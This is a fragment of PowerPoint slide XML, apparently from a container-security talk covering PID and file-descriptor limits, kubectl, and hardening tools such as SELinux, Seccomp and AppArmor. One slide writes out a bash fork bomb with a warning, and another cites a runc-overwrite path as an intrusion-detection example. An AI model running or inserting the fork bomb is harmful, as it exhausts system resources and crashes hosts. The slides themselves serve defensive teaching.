              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PIDs,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>File descriptors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7EA0E2-6295-A641-AFB3-BD845563867F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614931" y="6046571"/>
            <a:ext cx="985891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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kubectl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> run --rm -it bb --image=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>busybox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f(){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>f|f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; };f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># WARNING: Don't try this! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54072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E9CEA2-87E7-6942-9A6A-1EACC1061B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175657" y="37156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114DD55-950E-934A-8969-322F3E40EC79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Things We Have Done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779E8F-3E21-144F-A71D-F8C020BC240E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739202" y="1638165"/>
            <a:ext cx="10713596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altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Hardware Isolation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altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Security Tools -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SELinux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Seccomp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AppArmor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Capabilities, Cgroup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altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Intrusion Detection -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 suspicious read/write to host files. For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example,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containerd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-shim/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busybox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/docker-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runc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usr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/bin/docker-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runc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/bin/bash /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bad_init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/proc/self/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fd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altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Linux Kernel Patch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573437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84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E43F178-DF4F-DA42-981D-B5429DBDEE1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8835081" y="2953265"/>
            <a:ext cx="2699640" cy="3264223"/>
            <a:chOff x="16779714" y="3646099"/>
            <a:chExt cx="5062152" cy="6168664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 790">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD060B1C-35D9-6643-8DD8-80E286D6C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53355" y="7323775"/>
              <a:ext cx="459710" cy="534546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 43"/>
                <a:gd name="T1" fmla="*/ 10 h 50"/>
                <a:gd name="T2" fmla="*/ 19 w 43"/>
                <a:gd name="T3" fmla="*/ 12 h 50"/>
                <a:gd name="T4" fmla="*/ 13 w 43"/>
                <a:gd name="T5" fmla="*/ 13 h 50"/>
                <a:gd name="T6" fmla="*/ 10 w 43"/>
                <a:gd name="T7" fmla="*/ 6 h 50"/>
                <a:gd name="T8" fmla="*/ 4 w 43"/>
                <a:gd name="T9" fmla="*/ 10 h 50"/>
                <a:gd name="T10" fmla="*/ 10 w 43"/>
                <a:gd name="T11" fmla="*/ 49 h 50"/>
                <a:gd name="T12" fmla="*/ 26 w 43"/>
                <a:gd name="T13" fmla="*/ 48 h 50"/>
                <a:gd name="T14" fmla="*/ 34 w 43"/>
                <a:gd name="T15" fmla="*/ 47 h 50"/>
                <a:gd name="T16" fmla="*/ 32 w 43"/>
                <a:gd name="T17" fmla="*/ 39 h 50"/>
                <a:gd name="T18" fmla="*/ 26 w 43"/>
                <a:gd name="T19" fmla="*/ 40 h 50"/>
                <a:gd name="T20" fmla="*/ 26 w 43"/>
                <a:gd name="T21" fmla="*/ 38 h 50"/>
                <a:gd name="T22" fmla="*/ 37 w 43"/>
                <a:gd name="T23" fmla="*/ 36 h 50"/>
                <a:gd name="T24" fmla="*/ 35 w 43"/>
                <a:gd name="T25" fmla="*/ 28 h 50"/>
                <a:gd name="T26" fmla="*/ 25 w 43"/>
                <a:gd name="T27" fmla="*/ 30 h 50"/>
                <a:gd name="T28" fmla="*/ 24 w 43"/>
                <a:gd name="T29" fmla="*/ 29 h 50"/>
                <a:gd name="T30" fmla="*/ 37 w 43"/>
                <a:gd name="T31" fmla="*/ 26 h 50"/>
                <a:gd name="T32" fmla="*/ 36 w 43"/>
                <a:gd name="T33" fmla="*/ 19 h 50"/>
                <a:gd name="T34" fmla="*/ 23 w 43"/>
                <a:gd name="T35" fmla="*/ 21 h 50"/>
                <a:gd name="T36" fmla="*/ 23 w 43"/>
                <a:gd name="T37" fmla="*/ 19 h 50"/>
                <a:gd name="T38" fmla="*/ 33 w 43"/>
                <a:gd name="T39" fmla="*/ 17 h 50"/>
                <a:gd name="T40" fmla="*/ 32 w 43"/>
                <a:gd name="T41" fmla="*/ 1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50">
                  <a:moveTo>
                    <a:pt x="32" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="10"/>
                    <a:pt x="22" y="11"/>
                    <a:pt x="19" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="13"/>
                    <a:pt x="24" y="11"/>
                    <a:pt x="13" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="13"/>
                    <a:pt x="9" y="12"/>
                    <a:pt x="10" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="4" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="3" y="47"/>
                    <a:pt x="10" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="50"/>
                    <a:pt x="20" y="49"/>
                    <a:pt x="26" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="48"/>
                    <a:pt x="34" y="47"/>
                    <a:pt x="34" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="45"/>
                    <a:pt x="38" y="38"/>
                    <a:pt x="32" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="39"/>
                    <a:pt x="28" y="39"/>
                    <a:pt x="26" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="38"/>
                    <a:pt x="26" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="38"/>
                    <a:pt x="37" y="36"/>
                    <a:pt x="37" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="35"/>
                    <a:pt x="41" y="27"/>
                    <a:pt x="35" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="28"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="25" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="31"/>
                    <a:pt x="23" y="29"/>
                    <a:pt x="24" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="28"/>
                    <a:pt x="37" y="26"/>
                    <a:pt x="37" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="25"/>
                    <a:pt x="42" y="18"/>
                    <a:pt x="36" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="19"/>
                    <a:pt x="25" y="20"/>
                    <a:pt x="23" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="21"/>
                    <a:pt x="21" y="20"/>
                    <a:pt x="23" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="19"/>
                    <a:pt x="33" y="17"/>
                    <a:pt x="33" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="16"/>
                    <a:pt x="38" y="8"/>
                    <a:pt x="32" y="10"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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791">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86EB45D8-ED67-3146-859C-3E3957C8E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72120" y="7697958"/>
              <a:ext cx="224509" cy="138982"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 21"/>
                <a:gd name="T1" fmla="*/ 4 h 13"/>
                <a:gd name="T2" fmla="*/ 13 w 21"/>
                <a:gd name="T3" fmla="*/ 2 h 13"/>
                <a:gd name="T4" fmla="*/ 15 w 21"/>
                <a:gd name="T5" fmla="*/ 10 h 13"/>
                <a:gd name="T6" fmla="*/ 8 w 21"/>
                <a:gd name="T7" fmla="*/ 11 h 13"/>
                <a:gd name="T8" fmla="*/ 6 w 21"/>
                <a:gd name="T9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3">
                  <a:moveTo>
                    <a:pt x="6" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="2"/>
                    <a:pt x="13" y="2"/>
                    <a:pt x="13" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="15" y="10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2" y="13"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="6" y="4"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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" name="Freeform 792">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B9750CD-98B0-5349-A038-0934F224C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22591" y="4533445"/>
              <a:ext cx="2469602" cy="5270623"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 181 w 231"/>
                <a:gd name="T1" fmla="*/ 446 h 493"/>
                <a:gd name="T2" fmla="*/ 187 w 231"/>
                <a:gd name="T3" fmla="*/ 324 h 493"/>
                <a:gd name="T4" fmla="*/ 183 w 231"/>
                <a:gd name="T5" fmla="*/ 313 h 493"/>
                <a:gd name="T6" fmla="*/ 170 w 231"/>
                <a:gd name="T7" fmla="*/ 306 h 493"/>
                <a:gd name="T8" fmla="*/ 166 w 231"/>
                <a:gd name="T9" fmla="*/ 297 h 493"/>
                <a:gd name="T10" fmla="*/ 164 w 231"/>
                <a:gd name="T11" fmla="*/ 288 h 493"/>
                <a:gd name="T12" fmla="*/ 163 w 231"/>
                <a:gd name="T13" fmla="*/ 278 h 493"/>
                <a:gd name="T14" fmla="*/ 175 w 231"/>
                <a:gd name="T15" fmla="*/ 265 h 493"/>
                <a:gd name="T16" fmla="*/ 179 w 231"/>
                <a:gd name="T17" fmla="*/ 231 h 493"/>
                <a:gd name="T18" fmla="*/ 186 w 231"/>
                <a:gd name="T19" fmla="*/ 265 h 493"/>
                <a:gd name="T20" fmla="*/ 191 w 231"/>
                <a:gd name="T21" fmla="*/ 275 h 493"/>
                <a:gd name="T22" fmla="*/ 194 w 231"/>
                <a:gd name="T23" fmla="*/ 281 h 493"/>
                <a:gd name="T24" fmla="*/ 184 w 231"/>
                <a:gd name="T25" fmla="*/ 183 h 493"/>
                <a:gd name="T26" fmla="*/ 152 w 231"/>
                <a:gd name="T27" fmla="*/ 149 h 493"/>
                <a:gd name="T28" fmla="*/ 165 w 231"/>
                <a:gd name="T29" fmla="*/ 126 h 493"/>
                <a:gd name="T30" fmla="*/ 160 w 231"/>
                <a:gd name="T31" fmla="*/ 126 h 493"/>
                <a:gd name="T32" fmla="*/ 137 w 231"/>
                <a:gd name="T33" fmla="*/ 177 h 493"/>
                <a:gd name="T34" fmla="*/ 131 w 231"/>
                <a:gd name="T35" fmla="*/ 191 h 493"/>
                <a:gd name="T36" fmla="*/ 108 w 231"/>
                <a:gd name="T37" fmla="*/ 123 h 493"/>
                <a:gd name="T38" fmla="*/ 163 w 231"/>
                <a:gd name="T39" fmla="*/ 83 h 493"/>
                <a:gd name="T40" fmla="*/ 209 w 231"/>
                <a:gd name="T41" fmla="*/ 105 h 493"/>
                <a:gd name="T42" fmla="*/ 222 w 231"/>
                <a:gd name="T43" fmla="*/ 40 h 493"/>
                <a:gd name="T44" fmla="*/ 95 w 231"/>
                <a:gd name="T45" fmla="*/ 0 h 493"/>
                <a:gd name="T46" fmla="*/ 34 w 231"/>
                <a:gd name="T47" fmla="*/ 14 h 493"/>
                <a:gd name="T48" fmla="*/ 31 w 231"/>
                <a:gd name="T49" fmla="*/ 14 h 493"/>
                <a:gd name="T50" fmla="*/ 95 w 231"/>
                <a:gd name="T51" fmla="*/ 150 h 493"/>
                <a:gd name="T52" fmla="*/ 43 w 231"/>
                <a:gd name="T53" fmla="*/ 192 h 493"/>
                <a:gd name="T54" fmla="*/ 57 w 231"/>
                <a:gd name="T55" fmla="*/ 301 h 493"/>
                <a:gd name="T56" fmla="*/ 34 w 231"/>
                <a:gd name="T57" fmla="*/ 244 h 493"/>
                <a:gd name="T58" fmla="*/ 69 w 231"/>
                <a:gd name="T59" fmla="*/ 258 h 493"/>
                <a:gd name="T60" fmla="*/ 75 w 231"/>
                <a:gd name="T61" fmla="*/ 267 h 493"/>
                <a:gd name="T62" fmla="*/ 76 w 231"/>
                <a:gd name="T63" fmla="*/ 267 h 493"/>
                <a:gd name="T64" fmla="*/ 102 w 231"/>
                <a:gd name="T65" fmla="*/ 272 h 493"/>
                <a:gd name="T66" fmla="*/ 106 w 231"/>
                <a:gd name="T67" fmla="*/ 281 h 493"/>
                <a:gd name="T68" fmla="*/ 105 w 231"/>
                <a:gd name="T69" fmla="*/ 291 h 493"/>
                <a:gd name="T70" fmla="*/ 102 w 231"/>
                <a:gd name="T71" fmla="*/ 301 h 493"/>
                <a:gd name="T72" fmla="*/ 94 w 231"/>
                <a:gd name="T73" fmla="*/ 313 h 493"/>
                <a:gd name="T74" fmla="*/ 68 w 231"/>
                <a:gd name="T75" fmla="*/ 315 h 493"/>
                <a:gd name="T76" fmla="*/ 74 w 231"/>
                <a:gd name="T77" fmla="*/ 409 h 493"/>
                <a:gd name="T78" fmla="*/ 71 w 231"/>
                <a:gd name="T79" fmla="*/ 485 h 493"/>
                <a:gd name="T80" fmla="*/ 122 w 231"/>
                <a:gd name="T81" fmla="*/ 485 h 493"/>
                <a:gd name="T82" fmla="*/ 123 w 231"/>
                <a:gd name="T83" fmla="*/ 412 h 493"/>
                <a:gd name="T84" fmla="*/ 138 w 231"/>
                <a:gd name="T85" fmla="*/ 403 h 493"/>
                <a:gd name="T86" fmla="*/ 137 w 231"/>
                <a:gd name="T87" fmla="*/ 476 h 493"/>
                <a:gd name="T88" fmla="*/ 205 w 231"/>
                <a:gd name="T89" fmla="*/ 492 h 493"/>
                <a:gd name="T90" fmla="*/ 205 w 231"/>
                <a:gd name="T91" fmla="*/ 461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31" h="493">
                  <a:moveTo>
                    <a:pt x="205" y="461"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="462"/>
                    <a:pt x="179" y="464"/>
                    <a:pt x="181" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="425"/>
                    <a:pt x="189" y="412"/>
                    <a:pt x="190" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="366"/>
                    <a:pt x="192" y="350"/>
                    <a:pt x="187" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="320"/>
                    <a:pt x="185" y="316"/>
                    <a:pt x="184" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="313"/>
                    <a:pt x="183" y="313"/>
                    <a:pt x="183" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="314"/>
                    <a:pt x="177" y="314"/>
                    <a:pt x="175" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="311"/>
                    <a:pt x="171" y="309"/>
                    <a:pt x="170" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="305"/>
                    <a:pt x="170" y="304"/>
                    <a:pt x="170" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="301"/>
                    <a:pt x="167" y="299"/>
                    <a:pt x="166" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="296"/>
                    <a:pt x="166" y="294"/>
                    <a:pt x="166" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="291"/>
                    <a:pt x="164" y="290"/>
                    <a:pt x="164" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="286"/>
                    <a:pt x="163" y="283"/>
                    <a:pt x="164" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="280"/>
                    <a:pt x="163" y="279"/>
                    <a:pt x="163" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="273"/>
                    <a:pt x="165" y="267"/>
                    <a:pt x="171" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="265"/>
                    <a:pt x="175" y="265"/>
                    <a:pt x="175" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="253"/>
                    <a:pt x="171" y="234"/>
                    <a:pt x="170" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="223"/>
                    <a:pt x="175" y="227"/>
                    <a:pt x="179" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="242"/>
                    <a:pt x="185" y="252"/>
                    <a:pt x="181" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="264"/>
                    <a:pt x="184" y="264"/>
                    <a:pt x="186" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="267"/>
                    <a:pt x="190" y="269"/>
                    <a:pt x="190" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="272"/>
                    <a:pt x="191" y="274"/>
                    <a:pt x="191" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="276"/>
                    <a:pt x="194" y="278"/>
                    <a:pt x="194" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="281"/>
                    <a:pt x="194" y="281"/>
                    <a:pt x="194" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="267"/>
                    <a:pt x="210" y="241"/>
                    <a:pt x="206" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="215"/>
                    <a:pt x="194" y="194"/>
                    <a:pt x="184" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="179"/>
                    <a:pt x="175" y="175"/>
                    <a:pt x="160" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="170"/>
                    <a:pt x="143" y="161"/>
                    <a:pt x="152" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="146"/>
                    <a:pt x="171" y="142"/>
                    <a:pt x="180" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="131"/>
                    <a:pt x="170" y="128"/>
                    <a:pt x="165" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="125"/>
                    <a:pt x="163" y="125"/>
                    <a:pt x="163" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="125"/>
                    <a:pt x="161" y="125"/>
                    <a:pt x="160" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="128"/>
                    <a:pt x="149" y="131"/>
                    <a:pt x="145" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="152"/>
                    <a:pt x="137" y="168"/>
                    <a:pt x="137" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="183"/>
                    <a:pt x="138" y="186"/>
                    <a:pt x="135" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="190"/>
                    <a:pt x="133" y="191"/>
                    <a:pt x="131" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="191"/>
                    <a:pt x="125" y="187"/>
                    <a:pt x="123" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="168"/>
                    <a:pt x="101" y="156"/>
                    <a:pt x="108" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="101"/>
                    <a:pt x="139" y="82"/>
                    <a:pt x="159" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="82"/>
                    <a:pt x="161" y="82"/>
                    <a:pt x="163" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="82"/>
                    <a:pt x="165" y="82"/>
                    <a:pt x="166" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="82"/>
                    <a:pt x="198" y="92"/>
                    <a:pt x="209" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="90"/>
                    <a:pt x="223" y="73"/>
                    <a:pt x="223" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="49"/>
                    <a:pt x="222" y="44"/>
                    <a:pt x="222" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="39"/>
                    <a:pt x="214" y="37"/>
                    <a:pt x="210" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="11"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="0"/>
                    <a:pt x="52" y="4"/>
                    <a:pt x="47" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="12"/>
                    <a:pt x="38" y="14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3" y="14"/>
                    <a:pt x="32" y="14"/>
                    <a:pt x="31" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="26"/>
                    <a:pt x="23" y="40"/>
                    <a:pt x="23" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="99"/>
                    <a:pt x="53" y="138"/>
                    <a:pt x="95" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="159"/>
                    <a:pt x="101" y="169"/>
                    <a:pt x="96" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="175"/>
                    <a:pt x="61" y="178"/>
                    <a:pt x="43" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="199"/>
                    <a:pt x="3" y="224"/>
                    <a:pt x="2" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="258"/>
                    <a:pt x="31" y="287"/>
                    <a:pt x="57" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="292"/>
                    <a:pt x="54" y="280"/>
                    <a:pt x="56" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="264"/>
                    <a:pt x="36" y="250"/>
                    <a:pt x="34" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="238"/>
                    <a:pt x="68" y="227"/>
                    <a:pt x="69" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="244"/>
                    <a:pt x="70" y="250"/>
                    <a:pt x="69" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="258"/>
                    <a:pt x="72" y="259"/>
                    <a:pt x="73" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="262"/>
                    <a:pt x="75" y="265"/>
                    <a:pt x="75" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="267"/>
                    <a:pt x="76" y="267"/>
                    <a:pt x="76" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="267"/>
                    <a:pt x="76" y="267"/>
                    <a:pt x="76" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="265"/>
                    <a:pt x="90" y="265"/>
                    <a:pt x="90" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="264"/>
                    <a:pt x="101" y="267"/>
                    <a:pt x="102" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="273"/>
                    <a:pt x="102" y="274"/>
                    <a:pt x="102" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="277"/>
                    <a:pt x="105" y="279"/>
                    <a:pt x="106" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="284"/>
                    <a:pt x="106" y="287"/>
                    <a:pt x="104" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="290"/>
                    <a:pt x="105" y="290"/>
                    <a:pt x="105" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="295"/>
                    <a:pt x="105" y="298"/>
                    <a:pt x="102" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="301"/>
                    <a:pt x="102" y="301"/>
                    <a:pt x="102" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="306"/>
                    <a:pt x="101" y="311"/>
                    <a:pt x="95" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="313"/>
                    <a:pt x="94" y="313"/>
                    <a:pt x="94" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="315"/>
                    <a:pt x="86" y="315"/>
                    <a:pt x="86" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="316"/>
                    <a:pt x="75" y="317"/>
                    <a:pt x="68" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="315"/>
                    <a:pt x="66" y="315"/>
                    <a:pt x="66" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="360"/>
                    <a:pt x="68" y="386"/>
                    <a:pt x="74" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="442"/>
